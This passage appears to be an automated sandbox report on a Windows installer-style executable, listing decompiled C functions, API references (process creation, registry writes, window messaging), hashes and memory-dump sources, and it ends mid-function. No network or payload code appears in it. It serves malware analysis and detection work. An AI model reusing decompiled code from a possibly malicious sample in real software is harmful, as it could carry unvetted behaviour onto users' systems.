                                                                              • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 35%
                                                                              			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













                                                                              0x0040454d
                                                                              0x00404551
                                                                              0x00404559
                                                                              0x0040455c
                                                                              0x0040455d
                                                                              0x0040455f
                                                                              0x00404561
                                                                              0x00404564
                                                                              0x00404564
                                                                              0x0040456b
                                                                              0x00404571
                                                                              0x00404571
                                                                              0x00404578
                                                                              0x00404583
                                                                              0x00404584
                                                                              0x00404587
                                                                              0x00404587
                                                                              0x00404594
                                                                              0x0040459f
                                                                              0x004045a2
                                                                              0x004045b4
                                                                              0x004045bb
                                                                              0x004045bc
                                                                              0x004045cb
                                                                              0x004045db
                                                                              0x004045f7

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                              • wsprintfA.USER32 ref: 004045DB
                                                                              • SetDlgItemTextA.USER32 ref: 004045EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                              • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                              • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                              • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                                              0x00401c19
                                                                              0x00401c22
                                                                              0x00401c2e
                                                                              0x00401c31
                                                                              0x00401c3b
                                                                              0x00401c3b
                                                                              0x00401c3e
                                                                              0x00401c42
                                                                              0x00401c4c
                                                                              0x00401c4c
                                                                              0x00401c4f
                                                                              0x00401c53
                                                                              0x00401c55
                                                                              0x00401ca2
                                                                              0x00401ca4
                                                                              0x00401cad
                                                                              0x00401cb5
                                                                              0x00401cb8
                                                                              0x00401cb8
                                                                              0x00401cc1
                                                                              0x00000000
                                                                              0x00401c57
                                                                              0x00401c5e
                                                                              0x00401c60
                                                                              0x00401c68
                                                                              0x00401c6b
                                                                              0x00401c93
                                                                              0x00401cc7
                                                                              0x00401cc7
                                                                              0x00401c6d
                                                                              0x00401c7b
                                                                              0x00401c83
                                                                              0x00401c86
                                                                              0x00401c86
                                                                              0x00401c6b
                                                                              0x00401cca
                                                                              0x00401ccd
                                                                              0x00401cd3
                                                                              0x004028d7
                                                                              0x004028d7
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                              • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                              • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                              • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                              0x00401ea2
                                                                              0x00401ea7
                                                                              0x00401eb2
                                                                              0x00401eb9
                                                                              0x00401ebc
                                                                              0x004026da
                                                                              0x00401ec2
                                                                              0x00401ec5
                                                                              0x00401ed6
                                                                              0x00401ed1
                                                                              0x00401ed1
                                                                              0x00401eeb
                                                                              0x00401ef4
                                                                              0x00401f04
                                                                              0x00401f06
                                                                              0x00401f06
                                                                              0x00401ef6
                                                                              0x00401efa
                                                                              0x00401efa
                                                                              0x00401ef4
                                                                              0x00401f0d
                                                                              0x00401f10
                                                                              0x00401f10
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                                • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                                • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                                • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                              • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                              • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 4003922372-501415292
                                                                              • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                              • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                              • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                              • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                                                              0x00405250
                                                                              0x0040525a
                                                                              0x00405265
                                                                              0x0040526b
                                                                              0x0040526b
                                                                              0x00405283
                                                                              0x0040528b
                                                                              0x00405290
                                                                              0x00000000
                                                                              0x00405296
                                                                              0x0040529a

                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                              • CloseHandle.KERNEL32(?), ref: 00405290
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: AttributesCloseCreateFileHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 2000254098-66219284
                                                                              • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                              • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                              • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                              • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                              0x004054cd
                                                                              0x004054e4
                                                                              0x004054ec
                                                                              0x004054ec
                                                                              0x004054f4

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-3916508600
                                                                              • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                              • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                              • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                              • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










                                                                              0x00402387
                                                                              0x0040238c
                                                                              0x00402396
                                                                              0x004023a0
                                                                              0x004023a3
                                                                              0x004023b5
                                                                              0x004023bc
                                                                              0x004023c4
                                                                              0x004023d2
                                                                              0x004023d6
                                                                              0x004023e1
                                                                              0x004023e1
                                                                              0x004023e5
                                                                              0x004023e9
                                                                              0x004023ef
                                                                              0x004023f4
                                                                              0x004023f4
                                                                              0x004023f8
                                                                              0x00402404
                                                                              0x00402404
                                                                              0x0040241d
                                                                              0x0040241f
                                                                              0x0040241f
                                                                              0x00402422
                                                                              0x004024fb
                                                                              0x004024fb
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                              • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CloseCreateValuelstrlen
                                                                              • String ID:
                                                                              • API String ID: 1356686001-0
                                                                              • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                              • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                              • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                              • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                                              0x00401f50
                                                                              0x00401f53
                                                                              0x00401f5b
                                                                              0x00401f60
                                                                              0x00401f65
                                                                              0x00401f69
                                                                              0x00401f6c
                                                                              0x00401f6e
                                                                              0x00401f75
                                                                              0x00401f7e
                                                                              0x00401f86
                                                                              0x00401f89
                                                                              0x00401f9e
                                                                              0x00401fa4
                                                                              0x00401fb7
                                                                              0x00401fc0
                                                                              0x00401fcc
                                                                              0x00401fd1
                                                                              0x00401fd1
                                                                              0x00401fb7
                                                                              0x00401fd4
                                                                              0x00401be1
                                                                              0x00401be1
                                                                              0x00401f89
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                                • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1404258612-0
                                                                              • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                              • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                              • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                              • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
